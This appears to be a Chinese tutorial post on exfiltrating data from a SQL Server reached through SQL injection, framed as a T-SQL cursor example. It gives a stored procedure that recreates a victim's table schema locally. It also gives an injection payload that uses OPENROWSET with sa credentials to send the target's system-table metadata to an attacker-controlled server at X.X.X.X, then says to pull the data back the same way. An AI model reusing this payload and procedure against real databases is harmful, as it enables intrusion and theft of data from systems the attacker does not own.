文章没有什么亮点,主要是希望方便以及做个T-SQL游标使用的例子供大家参考。
假设我们控制的SQL服务器叫X.X.X.X,我们注入一个目标,可以openrowset,对系统表有select权限
连接查询分析器建立扩展储存:
CREATE PROCEDURE view_open_table
AS
BEGIN
IF (select count(*) from sysobjects where name='open_table')=0
BEGIN
print 'No table [open_table] here,I will create it...\n\n';
create table open_table(table_name varchar(255),column_name varchar(255),column_type varchar(255),column_length int);
END
ELSE
BEGIN
IF (select count(*) from open_table)>0
BEGIN
DECLARE @stmt varchar(1024),@t_name varchar(255),@c_name varchar(255),@c_type varchar(255),@c_length int;
DECLARE cur cursor FOR select table_name,column_name,column_type,column_length from open_table;
OPEN cur;
FETCH NEXT FROM cur INTO @t_name,@c_name,@c_type,@c_length;
print 'Creating table .....';
SET @stmt = 'CREATE TABLE '+@t_name + '(';
WHILE @@fetch_status=0
BEGIN
IF (@c_type = 'nvarchar' OR @c_type = 'varchar')
BEGIN SET @stmt = @stmt + @c_name + ' ' + @c_type + '(' + CAST(@c_length AS varchar(255)) + ')'; END;
ELSE BEGIN SET @stmt = @stmt + @c_name + ' ' + @c_type; END;
FETCH NEXT FROM cur INTO @t_name,@c_name,@c_type,@c_length;
IF @@fetch_status!=0 BREAK;
SET @stmt = @stmt + ',';
END
CLOSE cur;
DEALLOCATE cur;
SET @stmt = @stmt + ')';
EXEC(@stmt);
END
END
END;
这段代码是初始化环境的,建立一个叫open_table的表,结构如下:
create table open_table(table_name varchar(255),column_name varchar(255),column_type varchar(255),column_length int);
把扩展储存的代码注释掉,执行EXEC view_open_table完成初始化,在注入的机器,当然,任何可以执行对方SQL的地方都可以执行:
insert into openroset('sqloledb','server=X.X.X.X;uid=sa;pwd=123','select * from open_table') select t.name as table_name,c.name as column_name,ty.name as column_type,c.length as column_length from master.dbo.sysobjects t,master.dbo.syscolumns c,master.dbo.systypes ty where t.name='cmd' and t.xtype=char(85) and t.status>0 and t.id=c.id and c.xtype=ty.xtype and ty.name not in('sysname')
此时你的数据库里面已经包含了表cmd的结构:
当然是建立和对方一摸一样表,不过这个不用你操心了,再次执行EXEC view_open_table,看到creating table....就开始建表了,执行完毕你已经得到了一个和对方结构一摸一样,名字也一样的表。下面再open传回你要的数据就OK了。
